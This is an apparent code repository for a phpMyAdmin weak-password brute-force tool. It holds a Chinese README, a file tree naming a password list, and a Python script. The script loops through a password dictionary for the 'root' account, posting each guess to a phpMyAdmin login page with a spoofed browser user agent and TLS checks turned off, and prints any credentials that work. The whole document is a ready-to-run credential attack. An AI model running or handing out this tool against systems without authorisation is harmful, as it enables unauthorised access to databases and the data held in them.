├── README.md
├── password.txt
└── phpmyadmin.py


/README.md:
--------------------------------------------------------------------------------
1 | # phpmyadmin_Weak-password-blasting
2 | phpmyadmin弱口令爆破脚本
3 | ![image](https://github.com/user-attachments/assets/05b40e50-0a41-4788-9ccb-83e47729cc08)
4 | -r 添加自定义爆破字典 
5 | 


--------------------------------------------------------------------------------
/phpmyadmin.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import argparse
 3 | 
 4 | 
 5 | def phpmyadminFuzz(url, username, password_list):
 6 |     url = url.rstrip('/') + '/phpmyadmin/index.php'  # Ensure URL is well-formed
 7 |     for i in username:  # Iterate through usernames
 8 |         for j in password_list:  # Iterate through passwords
 9 |             data = {
10 |                 "pma_username": i,
11 |                 "pma_password": j,
12 |                 "server": "1",
13 |             }
14 |             try:
15 |                 headers = {
16 |                     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0'
17 |                 }
18 |                 r = requests.post(url, headers=headers, data=data, verify=False, allow_redirects=True, timeout=10)
19 |                 if r.status_code == 200 and 'phpMyAdmin phpStudy 2014' in r.text:
20 |                     print(f'\033[32m[+] {url} Login Success! username: {i} & password: {j}\033[0m')
21 |                     return  # Exit after successful login
22 |                 else:
23 |                     print(f'\033[31m[-] {url} Login Failed for username: {i} & password: {j}\033[0m')
24 |             except requests.exceptions.RequestException as e:
25 |                 print(f'[!] {url} is timeout or error occurred: {e}')
26 |                 break  # Exit loop on error
27 | 
28 | 
29 | def load_passwords(file_path):
30 |     with open(file_path, 'r') as file:
31 |         return [line.strip() for line in file.readlines()]
32 | 
33 | 
34 | if __name__ == "__main__":
35 |     parser = argparse.ArgumentParser(description='Brute force phpMyAdmin login')
36 |     parser.add_argument('url', help='URL of the phpMyAdmin instance')
37 |     parser.add_argument('-r', '--passwords', required=True, help='Path to the password dictionary file')
38 | 
39 |     args = parser.parse_args()
40 | 
41 |     # Default username list
42 |     username = ['root']
43 |     # Load passwords from the specified file
44 |     password_list = load_passwords(args.passwords)
45 | 
46 |     phpmyadminFuzz(args.url, username, password_list)
47 | 
48 | 
49 | 
50 | 
51 | 
52 | 


--------------------------------------------------------------------------------